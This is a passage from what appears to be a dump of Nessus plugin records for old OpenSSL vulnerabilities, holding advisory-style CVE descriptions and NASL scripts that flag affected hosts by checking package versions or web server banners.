crypto/ec/ec2_smpl.c, and (4) engines/e_ubsec.c, which has unspecified impact and context-dependent attack vectors. (CVE-2009-3245)\n\n - The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post- renegotiation context, related to a plaintext injection attack, aka the Project Mogul issue.\n (CVE-2009-3555)\n\n - Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678. (CVE-2009-4355)\n\n - The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot. (CVE-2010-0433)\n\n - The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL before 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1 before 1.0.1a does not properly interpret integer data, which allows remote attackers to conduct buffer overflow attacks, and cause a denial of service (memory corruption) or possibly have unspecified other impact, via crafted DER data, as demonstrated by an X.509 certificate or an RSA public key. (CVE-2012-2110)\n\n - The TLS protocol 1.2 and earlier, as used in Mozilla Firefox, Google Chrome, Qt, and other products, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which allows man-in-the- middle attackers to obtain plaintext HTTP headers by observing length differences during a series of guesses in which a string in an HTTP request potentially matches an unknown string in an HTTP header, aka a CRIME attack. (CVE-2012-4929)\n\n - OpenSSL before 0.9.8y, 1.0.0 before 1.0.0k, and 1.0.1 before 1.0.1d does not properly perform signature verification for OCSP responses, which allows remote OCSP servers to cause a denial of service (NULL pointer dereference and application crash) via an invalid key.\n (CVE-2013-0166)\n\n - The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side- channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the Lucky Thirteen issue. (CVE-2013-0169)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2019-08-12T00:00:00", "type": "nessus", "title": "NewStart CGSL CORE 5.04 / MAIN 5.04 : openssl098e Multiple Vulnerabilities (NS-SA-2019-0020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4339", "CVE-2006-4343", "CVE-2007-3108", "CVE-2007-4995", "CVE-2007-5135", "CVE-2008-1678", "CVE-2008-5077", "CVE-2009-0590", "CVE-2009-1377", "CVE-2009-1378", "CVE-2009-1379", "CVE-2009-1386", "CVE-2009-1387", "CVE-2009-2409", "CVE-2009-3245", "CVE-2009-3555", "CVE-2009-4355", "CVE-2010-0433", "CVE-2012-2110", "CVE-2012-4929", "CVE-2013-0166", "CVE-2013-0169"], "modified": "2021-01-14T00:00:00", "cpe": [], "id": "NEWSTART_CGSL_NS-SA-2019-0020_OPENSSL098E.NASL", "href": "https://www.tenable.com/plugins/nessus/127177", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2019-0020. The text\n# itself is copyright (C) ZTE, Inc.\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(127177);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\n \"CVE-2006-2937\",\n \"CVE-2006-2940\",\n \"CVE-2006-3738\",\n \"CVE-2006-4339\",\n \"CVE-2006-4343\",\n \"CVE-2007-3108\",\n \"CVE-2007-4995\",\n \"CVE-2007-5135\",\n \"CVE-2008-5077\",\n \"CVE-2009-0590\",\n \"CVE-2009-1377\",\n \"CVE-2009-1378\",\n \"CVE-2009-1379\",\n \"CVE-2009-1386\",\n \"CVE-2009-1387\",\n \"CVE-2009-2409\",\n \"CVE-2009-3245\",\n \"CVE-2009-3555\",\n \"CVE-2009-4355\",\n \"CVE-2010-0433\",\n \"CVE-2012-2110\",\n \"CVE-2012-4929\",\n \"CVE-2013-0166\",\n \"CVE-2013-0169\"\n );\n\n script_name(english:\"NewStart CGSL CORE 5.04 / MAIN 5.04 : openssl098e Multiple Vulnerabilities (NS-SA-2019-0020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote machine is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has openssl098e packages installed that are\naffected by multiple vulnerabilities:\n\n - OpenSSL 0.9.7 before 0.9.7l and 0.9.8 before 0.9.8d\n allows remote attackers to cause a denial of service\n (infinite loop and memory consumption) via malformed\n ASN.1 structures that trigger an improperly handled\n error condition. (CVE-2006-2937)\n\n - OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and\n earlier versions allows attackers to cause a denial of\n service (CPU consumption) via parasitic public keys with\n large (1) public exponent or (2) public modulus\n values in X.509 certificates that require extra time to\n process when using RSA signature verification.\n (CVE-2006-2940)\n\n - Buffer overflow in the SSL_get_shared_ciphers function\n in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and\n earlier versions has unspecified impact and remote\n attack vectors involving a long list of ciphers.\n (CVE-2006-3738)\n\n - OpenSSL before 0.9.7, 0.9.7 before 0.9.7k, and 0.9.8\n before 0.9.8c, when using an RSA key with exponent 3,\n removes PKCS-1 padding before generating a hash, which\n allows remote attackers to forge a PKCS #1 v1.5\n signature that is signed by that RSA key and prevents\n OpenSSL from correctly verifying X.509 and other\n certificates that use PKCS #1. (CVE-2006-4339)\n\n - The get_server_hello function in the SSLv2 client code\n in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and\n earlier versions allows remote servers to cause a denial\n of service (client crash) via unknown vectors that\n trigger a null pointer dereference. (CVE-2006-4343)\n\n - The BN_from_montgomery function in crypto/bn/bn_mont.c\n in OpenSSL 0.9.8e and earlier does not properly perform\n Montgomery multiplication, which might allow local users\n to conduct a side-channel attack and retrieve RSA\n private keys. (CVE-2007-3108)\n\n - Off-by-one error in the DTLS implementation in OpenSSL\n 0.9.8 before 0.9.8f allows remote attackers to execute\n arbitrary code via unspecified vectors. (CVE-2007-4995)\n\n - Off-by-one error in the SSL_get_shared_ciphers function\n in OpenSSL 0.9.7 up to 0.9.7l, and 0.9.8 up to 0.9.8f,\n might allow remote attackers to execute arbitrary code\n via a crafted packet that triggers a one-byte buffer\n underflow. NOTE: this issue was introduced as a result\n of a fix for CVE-2006-3738. As of 20071012, it is\n unknown whether code execution is possible.\n (CVE-2007-5135)\n\n - OpenSSL 0.9.8i and earlier does not properly check the\n return value from the EVP_VerifyFinal function, which\n allows remote attackers to bypass validation of the\n certificate chain via a malformed SSL/TLS signature for\n DSA and ECDSA keys. (CVE-2008-5077)\n\n - The ASN1_STRING_print_ex function in OpenSSL before\n 0.9.8k allows remote attackers to cause a denial of\n service (invalid memory access and application crash)\n via vectors that trigger printing of a (1) BMPString or\n (2) UniversalString with an invalid encoded length.\n (CVE-2009-0590)\n\n - The dtls1_buffer_record function in ssl/d1_pkt.c in\n OpenSSL 0.9.8k and earlier 0.9.8 versions allows remote\n attackers to cause a denial of service (memory\n consumption) via a large series of future epoch DTLS\n records that are buffered in a queue, aka DTLS record\n buffer limitation bug. (CVE-2009-1377)\n\n - Multiple memory leaks in the\n dtls1_process_out_of_seq_message function in\n ssl/d1_both.c in OpenSSL 0.9.8k and earlier 0.9.8\n versions allow remote attackers to cause a denial of\n service (memory consumption) via DTLS records that (1)\n are duplicates or (2) have sequence numbers much greater\n than current sequence numbers, aka DTLS fragment\n handling memory leak. (CVE-2009-1378)\n\n - Use-after-free vulnerability in the\n dtls1_retrieve_buffered_fragment function in\n ssl/d1_both.c in OpenSSL 1.0.0 Beta 2 allows remote\n attackers to cause a denial of service (openssl s_client\n crash) and possibly have unspecified other impact via a\n DTLS packet, as demonstrated by a packet from a server\n that uses a crafted server certificate. (CVE-2009-1379)\n\n - ssl/s3_pkt.c in OpenSSL before 0.9.8i allows remote\n attackers to cause a denial of service (NULL pointer\n dereference and daemon crash) via a DTLS\n ChangeCipherSpec packet that occurs before ClientHello.\n (CVE-2009-1386)\n\n - The dtls1_retrieve_buffered_fragment function in\n ssl/d1_both.c in OpenSSL before 1.0.0 Beta 2 allows\n remote attackers to cause a denial of service (NULL\n pointer dereference and daemon crash) via an out-of-\n sequence DTLS handshake message, related to a fragment\n bug. (CVE-2009-1387)\n\n - The Network Security Services (NSS) library before\n 3.12.3, as used in Firefox; GnuTLS before 2.6.4 and\n 2.7.4; OpenSSL 0.9.8 through 0.9.8k; and other products\n support MD2 with X.509 certificates, which might allow\n remote attackers to spoof certificates by using MD2\n design flaws to generate a hash collision in less than\n brute-force time. NOTE: the scope of this issue is\n currently limited because the amount of computation\n required is still large. (CVE-2009-2409)\n\n - OpenSSL before 0.9.8m does not check for a NULL return\n value from bn_wexpand function calls in (1)\n crypto/bn/bn_div.c, (2) crypto/bn/bn_gf2m.c, (3)\n crypto/ec/ec2_smpl.c, and (4) engines/e_ubsec.c, which\n has unspecified impact and context-dependent attack\n vectors. (CVE-2009-3245)\n\n - The TLS protocol, and the SSL protocol 3.0 and possibly\n earlier, as used in Microsoft Internet Information\n Services (IIS) 7.0, mod_ssl in the Apache HTTP Server\n 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5\n and earlier, Mozilla Network Security Services (NSS)\n 3.12.4 and earlier, multiple Cisco products, and other\n products, does not properly associate renegotiation\n handshakes with an existing connection, which allows\n man-in-the-middle attackers to insert data into HTTPS\n sessions, and possibly other types of sessions protected\n by TLS or SSL, by sending an unauthenticated request\n that is processed retroactively by a server in a post-\n renegotiation context, related to a plaintext\n injection attack, aka the Project Mogul issue.\n (CVE-2009-3555)\n\n - Memory leak in the zlib_stateful_finish function in\n crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and\n 1.0.0 Beta through Beta 4 allows remote attackers to\n cause a denial of service (memory consumption) via\n vectors that trigger incorrect calls to the\n CRYPTO_cleanup_all_ex_data function, as demonstrated by\n use of SSLv3 and PHP with the Apache HTTP Server, a\n related issue to CVE-2008-1678. (CVE-2009-4355)\n\n - The kssl_keytab_is_available function in ssl/kssl.c in\n OpenSSL before 0.9.8n, when Kerberos is enabled but\n Kerberos configuration files cannot be opened, does not\n check a certain return value, which allows remote\n attackers to cause a denial of service (NULL pointer\n dereference and daemon crash) via SSL cipher\n negotiation, as demonstrated by a chroot installation of\n Dovecot or stunnel without Kerberos configuration files\n inside the chroot. (CVE-2010-0433)\n\n - The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c\n in OpenSSL before 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1\n before 1.0.1a does not properly interpret integer data,\n which allows remote attackers to conduct buffer overflow\n attacks, and cause a denial of service (memory\n corruption) or possibly have unspecified other impact,\n via crafted DER data, as demonstrated by an X.509\n certificate or an RSA public key. (CVE-2012-2110)\n\n - The TLS protocol 1.2 and earlier, as used in Mozilla\n Firefox, Google Chrome, Qt, and other products, can\n encrypt compressed data without properly obfuscating the\n length of the unencrypted data, which allows man-in-the-\n middle attackers to obtain plaintext HTTP headers by\n observing length differences during a series of guesses\n in which a string in an HTTP request potentially matches\n an unknown string in an HTTP header, aka a CRIME\n attack. (CVE-2012-4929)\n\n - OpenSSL before 0.9.8y, 1.0.0 before 1.0.0k, and 1.0.1\n before 1.0.1d does not properly perform signature\n verification for OCSP responses, which allows remote\n OCSP servers to cause a denial of service (NULL pointer\n dereference and application crash) via an invalid key.\n (CVE-2013-0166)\n\n - The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0\n and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and\n other products, do not properly consider timing side-\n channel attacks on a MAC check requirement during the\n processing of malformed CBC padding, which allows remote\n attackers to conduct distinguishing attacks and\n plaintext-recovery attacks via statistical analysis of\n timing data for crafted packets, aka the Lucky\n Thirteen issue. (CVE-2013-0169)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2019-0020\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL openssl098e packages. Note that updated packages may not be available yet. Please contact\nZTE for more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2009-3245\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(20, 119, 189, 310, 399);\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/ZTE-CGSL/release\");\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, \"NewStart Carrier Grade Server Linux\");\n\nif (release !~ \"CGSL CORE 5.04\" &&\n release !~ \"CGSL MAIN 5.04\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL CORE 5.04 / NewStart CGSL MAIN 5.04');\n\nif (!get_kb_item(\"Host/ZTE-CGSL/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"NewStart Carrier Grade Server Linux\", cpu);\n\nflag = 0;\n\npkgs = {\n \"CGSL CORE 5.04\": [\n \"openssl098e-0.9.8e-29.el7.centos.3\",\n \"openssl098e-debuginfo-0.9.8e-29.el7.centos.3\"\n ],\n \"CGSL MAIN 5.04\": [\n \"openssl098e-0.9.8e-29.el7.centos.3\",\n \"openssl098e-debuginfo-0.9.8e-29.el7.centos.3\"\n ]\n};\npkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:\"ZTE \" + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl098e\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T15:11:22", "description": "According to its banner, the remote web server uses a version of OpenSSL older than 0.9.8m. Such versions have the following vulnerabilities :\n\n - Session renegotiations are not handled properly, which could be exploited to insert arbitrary plaintext by a man-in-the-middle. (CVE-2009-3555)\n\n - The library does not check for a NULL return value from calls to the bn_wexpand() function, which has unspecified impact.\n (CVE-2009-3245) \n - A memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c allows remote attackers to cause a denial of service via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function.\n (CVE-2008-1678, CVE-2009-4355) For this vulnerability to be exploitable, compression must be enabled in OpenSSL for SSL/TLS connections.", "cvss3": {"score": null, "vector": null}, "published": "2010-03-11T00:00:00", "type": "nessus", "title": "OpenSSL < 0.9.8m Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-4343", "CVE-2008-1678", "CVE-2009-3245", "CVE-2009-3555", "CVE-2009-4355"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:openssl:openssl"], "id": "OPENSSL_0_9_8M.NASL", "href": "https://www.tenable.com/plugins/nessus/45039", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(45039);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n\n script_cve_id(\"CVE-2006-4343\", \"CVE-2008-1678\", \"CVE-2009-3245\", \"CVE-2009-3555\", \"CVE-2009-4355\");\n script_bugtraq_id(31692, 36935, 38562);\n script_xref(name:\"Secunia\", value:\"37291\");\n script_xref(name:\"Secunia\", value:\"38200\");\n\n script_name(english:\"OpenSSL < 0.9.8m Multiple Vulnerabilities\");\n script_summary(english:\"Does a banner check\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote web server has multiple SSL-related vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its banner, the remote web server uses a version of\nOpenSSL older than 0.9.8m. Such versions have the following\nvulnerabilities :\n\n - Session renegotiations are not handled properly, which could\n be exploited to insert arbitrary plaintext by a\n man-in-the-middle. (CVE-2009-3555)\n\n - The library does not check for a NULL return value from calls\n to the bn_wexpand() function, which has unspecified impact.\n (CVE-2009-3245)\n \n - A memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c \n allows remote attackers to cause a denial of service via vectors that \n trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function.\n (CVE-2008-1678, CVE-2009-4355)\n \n For this vulnerability to be exploitable, compression must be enabled in OpenSSL\n for SSL/TLS connections. \n\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://rt.openssl.org/Ticket/Display.html?id=2111&user=guest&pass=guest\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=openssl-announce&m=126714485629486&w=2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to OpenSSL 0.9.8m or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 310, 399);\n script_set_attribute(attribute:\"vuln_publication_date\",value:\"2009/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\",value:\"2010/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\",value:\"2010/03/11\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:openssl:openssl\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencie(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 443);\n script_require_keys(\"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"backport.inc\");\n\n\nif (report_paranoia < 2)\n exit(1, \"This plugin only runs if 'Report paranoia' is set to 'Paranoid'.\");\n\nport = get_http_port(default:80);\nbanner = get_backport_banner(banner:get_http_banner(port:port));\nif (!banner) exit(1, \"Unable to get the banner from web server on port \"+port+\".\");\n\nif (!egrep(string:banner, pattern:'^Server:'))\n exit(0, \"The web server on port \"+port+\" doesn't return a Server response header.\");\nif (\"OpenSSL/\" >!< banner)\n exit(0, \"The Server response header for the web server on port \"+port+\" doesn't mention OpenSSL.\");\n\npat = \"^Server:.*OpenSSL/([^ ]+)\";\nversion = NULL;\n\nforeach line (split(banner, sep:'\\r\\n', keep:FALSE))\n{\n match = eregmatch(pattern:pat, string:line);\n if (!isnull(match))\n {\n version = match[1];\n break;\n }\n}\n\nif (isnull(version))\n exit(0, \"Failed to extract the version of OpenSSL used by the web server on port \"+port+\".\");\n\n# anything less than 0.9.8m, and anything that looks like 0.9.8-beta\nif (version =~ \"^0\\.9\\.([0-7]|8([^a-z0-9]|[a-l]|$))\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\nOpenSSL version '+version+' appears to be running on the remote\\n'+\n 'host based on the following Server response header :\\n\\n'+\n ' '+line+'\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse exit(0, 'The web server on port \"+port+\" uses OpenSSL '+version+', which is not affected.');\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-25T18:24:31", "description": "The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has openssl packages installed that are affected by multiple vulnerabilities:\n\n - OpenSSL 1.0.2 (starting from version 1.0.2b) introduced an error state mechanism. The intent was that if a fatal error occurred during a handshake then OpenSSL would move into the error state and would immediately fail if you attempted to continue the handshake. This works as designed for the explicit handshake functions (SSL_do_handshake(), SSL_accept() and SSL_connect()), however due to a bug it does not work correctly if SSL_read() or SSL_write() is called directly. In that scenario, if the handshake fails then a fatal error will be returned in the initial function call. If SSL_read()/SSL_write() is subsequently called by the application for the same SSL object then it will succeed and the data is passed without being decrypted/encrypted directly from the SSL/TLS record layer. In order to exploit this issue an application bug would have to be present that resulted in a call to SSL_read()/SSL_write() being issued after having already received a fatal error. OpenSSL version 1.0.2b-1.0.2m are affected. Fixed in OpenSSL 1.0.2n. OpenSSL 1.1.0 is not affected. (CVE-2017-3737)\n\n - There is an overflow bug in the AVX2 Montgomery multiplication procedure used in exponentiation with 1024-bit moduli. No EC algorithms are affected. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH1024 are considered just feasible, because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be significant. However, for an attack on TLS to be meaningful, the server would have to share the DH1024 private key among multiple clients, which is no longer an option since CVE-2016-0701. This only affects processors that support the AVX2 but not ADX extensions like Intel Haswell (4th generation).\n Note: The impact from this issue is similar to CVE-2017-3736, CVE-2017-3732 and CVE-2015-3193. OpenSSL version 1.0.2-1.0.2m and 1.1.0-1.1.0g are affected.\n Fixed in OpenSSL 1.0.2n. Due to the low severity of this issue we are not issuing a new release of OpenSSL 1.1.0 at this time. The fix will be included in OpenSSL 1.1.0h when it becomes available. The fix is also available in commit e502cc86d in the OpenSSL git repository.\n (CVE-2017-3738)\n\n - There is a carry propagating bug in the x86_64 Montgomery squaring procedure in OpenSSL before 1.0.2m and 1.1.0 before 1.1.0g. No EC algorithms are affected.\n Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH are considered just feasible (although very difficult) because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be very significant and likely only accessible to a limited number of attackers. An attacker would additionally need online access to an unpatched system using the target private key in a scenario with persistent DH parameters and a private key that is shared between multiple clients. This only affects processors that support the BMI1, BMI2 and ADX extensions like Intel Broadwell (5th generation) and later or AMD Ryzen. (CVE-2017-3736)\n\n - OpenSSL 0.9.7 before 0.9.7l and 0.9.8 before 0.9.8d allows remote attackers to cause a denial of service (infinite loop and memory consumption) via malformed ASN.1 structures that trigger an improperly handled error condition. (CVE-2006-2937)\n\n - OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows attackers to cause a denial of service (CPU consumption) via parasitic public keys with large (1) public exponent or (2) public modulus values in X.509 certificates that require extra time to process when using RSA signature verification.\n (CVE-2006-2940)\n\n - Buffer overflow in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions has unspecified impact and remote attack vectors involving a long list of ciphers.\n (CVE-2006-3738)\n\n - OpenSSL before 0.9.7, 0.9.7 before 0.9.7k, and 0.9.8 before 0.9.8c, when using an RSA key with exponent 3, removes PKCS-1 padding before generating a hash, which allows remote attackers to forge a PKCS #1 v1.5 signature that is signed by that RSA key and prevents OpenSSL from correctly verifying X.509 and other certificates that use PKCS #1. (CVE-2006-4339)\n\n - The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause a denial of service (client crash) via unknown vectors that trigger a null pointer dereference. (CVE-2006-4343)\n\n - The BN_from_montgomery function in crypto/bn/bn_mont.c in OpenSSL 0.9.8e and earlier does not properly perform Montgomery multiplication, which might allow local users to conduct a side-channel attack and retrieve RSA private keys. (CVE-2007-3108)\n\n - Off-by-one error in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8f allows remote attackers to execute arbitrary code via unspecified vectors. (CVE-2007-4995)\n\n - Off-by-one error in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 up to 0.9.7l, and 0.9.8 up to 0.9.8f, might allow remote attackers to execute arbitrary code via a crafted packet that triggers a one-byte buffer underflow. NOTE: this issue was introduced as a result of a fix for CVE-2006-3738. As of 20071012, it is unknown whether code execution is possible.\n (CVE-2007-5135)\n\n - Double free vulnerability in OpenSSL 0.9.8f and 0.9.8g, when the TLS server name extensions are enabled, allows remote attackers to cause a denial of service (crash) via a malformed Client Hello packet. NOTE: some of these details are obtained from third party information.\n (CVE-2008-0891)\n\n - OpenSSL 0.9.8f and 0.9.8g allows remote attackers to cause a denial of service (crash) via a TLS handshake that omits the Server Key Exchange message and uses particular cipher suites, which triggers a NULL pointer dereference. (CVE-2008-1672)\n\n - The dtls1_buffer_record function in ssl/d1_pkt.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allows remote attackers to cause a denial of service (memory consumption) via a large series of future epoch DTLS records that are buffered in a queue, aka DTLS record buffer limitation bug. (CVE-2009-1377)\n\n - Multiple memory leaks in the dtls1_process_out_of_seq_message function in ssl/d1_both.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allow remote attackers to cause a denial of service (memory consumption) via DTLS records that (1) are duplicates or (2) have sequence numbers much greater than current sequence numbers, aka DTLS fragment handling memory leak. (CVE-2009-1378)\n\n - Use-after-free vulnerability in the dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL 1.0.0 Beta 2 allows remote attackers to cause a denial of service (openssl s_client crash) and possibly have unspecified other impact via a DTLS packet, as demonstrated by a packet from a server that uses a crafted server certificate. (CVE-2009-1379)\n\n - The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post- renegotiation context, related to a plaintext injection attack, aka the Project Mogul issue.\n (CVE-2009-3555)\n\n - Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678. (CVE-2009-4355)\n\n - The Cryptographic Message Syntax (CMS) implementation in crypto/cms/cms_asn1.c in OpenSSL before 0.9.8o and 1.x before 1.0.0a does not properly handle structures that contain OriginatorInfo, which allows context-dependent attackers to modify invalid memory locations or conduct double-free attacks, and possibly execute arbitrary code, via unspecified vectors. (CVE-2010-0742)\n\n - RSA verification recovery in the EVP_PKEY_verify_recover function in OpenSSL 1.x before 1.0.0a, as used by pkeyutl and possibly other applications, returns uninitialized memory upon failure, which might allow context-dependent attackers to bypass intended key requirements or obtain sensitive information via unspecified vectors. NOTE: some of these details are obtained from third party information. (CVE-2010-1633)\n\n - Multiple race conditions in ssl/t1_lib.c in OpenSSL 0.9.8f through 0.9.8o, 1.0.0, and 1.0.0a, when 